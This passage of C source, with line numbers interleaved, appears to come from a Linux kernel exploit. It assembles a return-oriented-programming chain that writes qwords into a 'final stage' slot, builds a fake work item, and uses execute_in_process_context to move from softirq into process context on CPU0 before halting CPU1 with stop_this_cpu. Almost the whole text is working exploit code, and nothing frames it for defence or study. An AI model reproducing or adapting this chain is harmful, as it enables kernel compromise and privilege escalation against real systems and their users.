    ctx[rop++] = final_stage_slot_base + 0x100;
303
    ctx[rop++] = pop_rax_pop_rdx_ret;
304
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
305
    ctx[rop++] = pop_rax_pop_rdx_ret;
306
    ctx[rop++] = final_stage_slot_base + 0x108;
307
    ctx[rop++] = jmp_self;
308
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
309
    ctx[rop++] = pop_rax_pop_rdx_ret;
310
    ctx[rop++] = final_stage_slot_base + 0x110;
311
    ctx[rop++] = 0x0;
312
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
313
    ctx[rop++] = pop_rax_pop_rdx_ret;
314
    ctx[rop++] = final_stage_slot_base + 0x118;
315
    ctx[rop++] = jmp_self;
316
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
317

318
    // Softirq -> process-context bridge:
319
    //   rsi = fake work item
320
    //   rdi = CPU0
321
    //   execute_in_process_context+0x48 loads system_wq and calls queue_work_on()
322
    //   then stop CPU1 so CPU0 can run the queued kworker path
323
    ctx[rop++] = pop_rsi_pop_rdi_ret;
324
    ctx[rop++] = work_base;
325
    ctx[rop++] = 0x0;
326
    ctx[rop++] = execute_in_process_context_queue;
327
    // Queue onto CPU0 and then stop CPU1 without re-enabling interrupts.
328
    ctx[rop++] = pop_rdx_pop_rdi_ret;
329
    ctx[rop++] = 0x0;
330
    ctx[rop++] = 0x0;
331
    ctx[rop++] = stop_this_cpu;
332
}